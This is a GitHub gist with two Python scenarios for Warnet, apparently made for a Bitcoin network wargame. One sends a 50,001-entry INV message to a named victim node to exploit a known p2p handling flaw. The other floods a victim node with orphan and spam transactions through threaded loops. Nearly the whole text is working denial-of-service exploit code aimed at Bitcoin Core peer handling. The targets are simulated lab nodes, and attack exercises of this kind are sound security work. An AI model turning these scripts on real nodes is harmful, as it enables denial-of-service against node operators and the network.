Skip to content

Instantly share code, notes, and snippets.

@harsh-98
Created January 23, 2026 15:32
Show Gist options
  • Select an option

  • Save harsh-98/1902f2642d7c3d69da1d19626a00bbe9 to your computer and use it in GitHub Desktop.

Select an option

Save harsh-98/1902f2642d7c3d69da1d19626a00bbe9 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import socket
import time
from commander import Commander
# The entire Bitcoin Core test_framework directory is available as a library
from test_framework.messages import MSG_TX, CInv, msg_inv
from test_framework.p2p import P2PInterface
from test_framework.messages import MSG_BLOCK
from test_framework.messages import msg_ping
# The actual scenario is a class like a Bitcoin Core functional test.
# Commander is a subclass of BitcoinTestFramework instide Warnet
# that allows to operate on containerized nodes instead of local nodes.
class Inv5K(Commander):
def set_test_params(self):
# This setting is ignored but still required as
# a sub-class of BitcoinTestFramework
self.num_nodes = 1
def add_options(self, parser):
parser.description = (
"Demonstrate INV attack using a scenario and P2PInterface"
)
parser.usage = "warnet run /path/to/my_first_attack_5kinv.py"
# Scenario entrypoint
def run_test(self):
# get context from any node
node = self.nodes[0]
# We pick a node on the network to attack
# We know this one is vulnderable to 5k inv messages based on it's subver
# Change this to your teams colour if running in the battleground
victim = "tank-0140-sapphire.default.svc"
# The victim's address could be an explicit IP address
# OR a kubernetes hostname (use default chain p2p port)
dstaddr = socket.gethostbyname(victim)
# print(dstaddr)
# Now we will use a python-based Bitcoin p2p node to send very specific,
# unusual or non-standard messages to a "victim" node.
# self.log.info(f"Attacking {victim}")
attacker = P2PInterface()
attacker.peer_connect(
dstaddr=dstaddr, dstport=node.p2pport, net=node.chain, timeout_factor=1
)()
attacker.wait_for_connect()
msg = msg_inv([CInv(MSG_BLOCK, 2) for _ in range(50001)])
attacker.send_message(msg)
# attacker.send_message(msg_ping(nonce=0))
# print(attacker.wait_for_getheaders())
print(attacker.last_message)
def main():
Inv5K().main()
if __name__ == "__main__":
main()
#!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor
from decimal import Decimal
import random
import socket
from commander import Commander
# The entire Bitcoin Core test_framework directory is available as a library
from test_framework.messages import (
msg_tx,
COIN,
CTransaction,
CTxOut,
CTxIn,
COutPoint,
SEQUENCE_FINAL,
)
from test_framework.script import CScript
from test_framework.p2p import P2PInterface
from test_framework.script import CScript, OP_TRUE
from test_framework.address import script_to_p2sh, address_to_scriptpubkey
from test_framework.messages import from_hex
# The actual scenario is a class like a Bitcoin Core functional test.
# Commander is a subclass of BitcoinTestFramework instide Warnet
# that allows to operate on containerized nodes instead of local nodes.
class Orphan50(Commander):
def set_test_params(self):
# This setting is ignored but still required as
# a sub-class of BitcoinTestFramework
self.num_nodes = 1
def add_options(self, parser):
parser.description = (
"Demonstrate orphan attack using a scenario and P2PInterface"
)
parser.usage = "warnet run /path/to/stub_orphan.py"
def run_test(self):
# Ensure that getblocktemplate can be called concurrently by many threads.
self.log.info("Check blocks in parallel")
# check_50_blocks = lambda n: [
# assert_template(n, block_3, "bad-txns-inputs-missingorspent", submit=False)
# for _ in range(50)
# ]
rpcs = []
for ind, n in enumerate(self.nodes):
# wallet = n.get_wallet_rpc(n.listwallets()[0])
# utxos = wallet.listunspent()
# l = len(utxos)
for (wallet_ind, wallet) in enumerate(n.listwallets()):
# small_utxos = utxos[size_ind*l//3 : (size_ind+1)*l//3]
rpcs.append((n, ind, wallet_ind, wallet))
# rpcs = [(n, i) for i, n in enumerate(self.nodes)]
with ThreadPoolExecutor(max_workers=len(rpcs)) as threads:
list(threads.map(self.node_handler, rpcs))
def send_transaction_worker(self, tx_data):
"""Worker function to send a transaction in parallel"""
wallet, tx_hex, expected_txid, node_ind, wallet_ind = tx_data
try:
txid = wallet.sendrawtransaction(tx_hex)
assert txid == expected_txid
self.log.info(f"[{node_ind},{wallet_ind}] Sent tx: {txid}")
return (True, txid)
except Exception as e:
self.log.error(f"[{node_ind},{wallet_ind}] Failed to send tx: {e}")
return (False, str(e))
# Scenario entrypoint
def node_handler(self, node_det):
node = node_det[0]
node_ind = node_det[1]
wallet_ind = node_det[2]
wallet = node.get_wallet_rpc(node_det[3])
# Get context from any node
# This scenario requires the nodes to not be in IBD
victim = "tank-0134-sapphire.default.svc"
# The victim's address could be an explicit IP address
# OR a kubernetes hostname (use default chain p2p port)
dstaddr = socket.gethostbyname(victim)
# Now we will use a python-based Bitcoin p2p node to send very specific,
# unusual or non-standard messages to a "victim" node.
self.log.info(f"Attacking {victim}")
attacker = P2PInterface()
attacker.peer_connect(
dstaddr=dstaddr, dstport=node.p2pport, net=node.chain, timeout_factor=1
)()
attacker.wait_for_connect()
addr = wallet.getnewaddress()
count = 0
# print(utxos[0])
# print(nexts)
while True :
utxos = wallet.listunspent()
self.log.info(f"{node_ind}, {wallet_ind} {len(utxos)}")
if len(utxos) == 0:
return
# Prepare all transactions first
tx_batch = []
for utxo in utxos:
# make a transaction that spends an output that doesn't exist
txid = int(utxo["txid"], 16)
vout = utxo["vout"]
amount = utxo["amount"]
tx = CTransaction()
tx.vin.extend(
[CTxIn(
COutPoint(
txid,
vout,
),
)]
)
attacker.send_message(msg_tx(tx))
if amount > Decimal('0.000001'): # 1000
send = int((amount-Decimal('0.000001')) * COIN)
# send = int(send/10)
for i in range(10000):
# print(send)
tx.vout = [
CTxOut(100, address_to_scriptpubkey(wallet.getnewaddress()))
]
tx_hex = wallet.signrawtransactionwithwallet(tx.serialize().hex())['hex']
print(tx_hex)
# txid = wallet.sendrawtransaction(tx_hex)
# assert txhash == txid
attacker.send_message(msg_tx(from_hex(CTransaction(), tx_hex)))
count+=1
if count % 100 == 0:
self.log.info(f"[{node_ind},{wallet_ind}] Sent {count} transactions so far")
# Send all transactions in parallel
# if tx_batch:
# self.log.info(f"[{node_ind},{wallet_ind}] Sending {len(tx_batch)} transactions in parallel")
# with ThreadPoolExecutor(max_workers=min(len(tx_batch), 20)) as executor:
# results = list(executor.map(self.send_transaction_worker, tx_batch))
# success_count = sum(1 for success, _ in results if success)
# self.log.info(f"[{node_ind},{wallet_ind}] Successfully sent {success_count}/{len(tx_batch)} transactions")
# NOW perhhaps we could do this 50 times to the node that is vulnerable to 50 orphans??
def main():
Orphan50().main()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment